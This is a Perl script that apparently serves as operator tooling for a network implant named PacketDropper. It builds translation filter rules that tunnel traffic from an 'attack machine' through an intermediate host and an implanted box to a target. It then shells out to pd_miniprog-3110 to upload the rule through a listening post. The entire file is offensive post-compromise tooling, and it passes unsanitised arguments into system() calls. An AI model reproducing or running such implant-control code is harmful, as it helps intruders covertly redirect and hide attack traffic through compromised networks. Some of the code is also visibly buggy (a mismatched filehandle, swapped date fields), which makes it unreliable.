#! /usr/bin/env perl use Getopt::Long; my $opt_lp = undef; my $opt_implant = undef; my $opt_idkey = undef; my $opt_sport = undef; my $opt_dport = undef; my $opt_lptimeout = undef; my $opt_bsize = undef; my $opt_cmd = undef; my $opt_attack_ip = undef; my $opt_intermediate_ip = undef; my $opt_attack_int = undef; my $opt_attack_port = undef; my $opt_target_int = undef; my $opt_port_offset = undef; my $opt_trans_timeout = undef; my $opt_pat_timeout = undef; my $opt_logdir = undef; my $opt_orig_dest_ip = undef; my $opt_help = undef; sub usage { print "\n\nstart_redirector.pl creates and uploads PacketDropper filter files and/or starts a local listener to perform encryption and redirection.\n\n"; print "Usage: pd_start_pat.pl --lp --implant --idkey \n"; print " [--lptimeout ] [--bsize ] --cmd \n"; print " --attack_ip --intermediate_ip \n"; print " --attack_int --target_int --port_offset \n"; print " --trans_timeout --pat_timeout --attack_port \n"; print " [--logdir ] [--help]\n\n"; if ( defined($opt_help) ) { extended_usage(); } } sub extended_usage { print " --lp \n"; print " IP Address of the LP box\n\n"; print " --implant \n"; print " IP Address of the Implanted box\n\n"; print " --idkey \n"; print " File containing key information for the implant\n\n"; print " [--lptimeout ]\n"; print " The amount of time (in seconds) the LP should wait for a response\n\n"; print " [--bsize ]\n"; print " (Optional) The max packet size for packets traveling between the LP and implant\n\n"; print " --cmd \n"; print " The command number of the PD_addRuleHandler in hex\n\n"; print " --intermediate_ip \n"; print " IP address of the intermediate machine\n\n"; print " [--orig_dest_ip ]\n"; print " IP address of the original destination IP for packets coming from the target\n\n"; print " --attack_ip \n"; print " IP address of the attack machine\n\n"; print " --attack_int \n"; print " Number of the interface that the attack machine is connected to\n\n"; print " --attack_port \n"; print " Port to tunnel to on the target machine\n\n"; print " --target_int \n"; print " Number of the interface that the target machine is connected to\n\n"; print " --port_offset \n"; print " First port to use when building the tranlations\n\n"; print " --trans_timeout \n"; print " Timeout for individual entries in the translation table\n\n"; print " --pat_timeout \n"; print " Overall timeout for the PAT action\n\n"; print " [--logdir ]\n"; print " (Optional) Directory to store log files in (defaults to .)\n"; print " --help\n\n"; } GetOptions( "lp=s" => \$opt_lp, "implant=s" => \$opt_implant, "idkey=s" => \$opt_idkey, "sport=s" => \$opt_sport, "dport=s" => \$opt_dport, "lptimeout=s" => \$opt_lptimeout, "bsize=s" => \$opt_bsize, "cmd=s" => \$opt_cmd, "attack_ip=s" => \$opt_attack_ip, "intermediate_ip=s" => \$opt_intermediate_ip, "attack_int=s" => \$opt_attack_int, "attack_port=s" => \$opt_attack_port, "target_int=s" => \$opt_target_int, "port_offset=s" => \$opt_port_offset, "trans_timeout=s" => \$opt_trans_timeout, "pat_timeout=s" => \$opt_pat_timeout, "logdir=s" => \$opt_logdir, "orig_dest_ip=s" => \$opt_orig_dest_ip, "help" => \$opt_help ); if ( !defined($opt_lp) || !defined($opt_implant) || !defined($opt_sport) || !defined($opt_dport) || !defined($opt_cmd) || !defined($opt_target_int) || !defined($opt_intermediate_ip) || !defined($opt_attack_int) || !defined($opt_port_offset) || !defined($opt_trans_timeout) || !defined($opt_attack_ip) || !defined($opt_pat_timeout) || defined($opt_help) ) { usage(); die; } if ( !defined($opt_orig_dest_ip) ) { $opt_orig_dest_ip = $opt_attack_ip; } my ( $sec, $min, $hour, $day, $month, $year ) = localtime(time); $year += 1900; my $pat_filt_filename = sprintf( "%s/%s/pat_filter_%04d%02d%02d_%02d%02d%02d", $opt_logdir, $opt_implant, $year, $day, $month, $hour, $min, $sec ); if ( !defined($opt_attack_port) ) { $opt_attack_port = 0; } open( PAT_FILT, ">", $pat_filt_filename ) or system("mkdir $opt_implant"); open( PAT_FILT, ">", $pat_filt_filename ) or die "Could not create PAT filter file\n"; printf( PAT_FILT "1 %s %s 6 %s %s %s %s %s %s %s dst host %s", ($opt_target_int), $opt_pat_timeout, $opt_intermediate_ip, $opt_orig_dest_ip, $opt_attack_ip, ($opt_attack_int), $opt_port_offset, $opt_attack_port, $opt_trans_timeout, $opt_orig_dest_ip ); printf( PAT_FILT "\n2 %s %s 7 %s src host %s and dst host %s", ($opt_attack_int), $opt_pat_timeout, $opt_port_offset, $opt_attack_ip, $opt_intermediate_ip ); if ( $opt_attack_port != 0 ) { printf( PAT_FILE " src port %s", $opt_attack_port ); } printf( PAT_FILE "\n" ); close(PAT_FILT); my $pd_mini = sprintf( "./pd_miniprog-3110 --lp %s --implant %s --idkey %s --sport %s --dport %s ", $opt_lp, $opt_implant, $opt_idkey, $opt_sport, $opt_dport, ); if ( defined($opt_lptimeout) ) { $pd_mini = sprintf( "%s --lptimeout %s", $pd_mini, $opt_lptimeout ); } if ( defined($opt_bsize) ) { $pd_mini = sprintf( "%s --bsize %s", $pd_mini, $opt_bsize ); } if ( defined($opt_logdir) ) { $pd_mini = sprintf( "%s --logdir %s", $pd_mini, $opt_logdir ); } print "$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename\n"; system("$pd_mini --cmd $opt_cmd --name add_rule --arg $pat_filt_filename");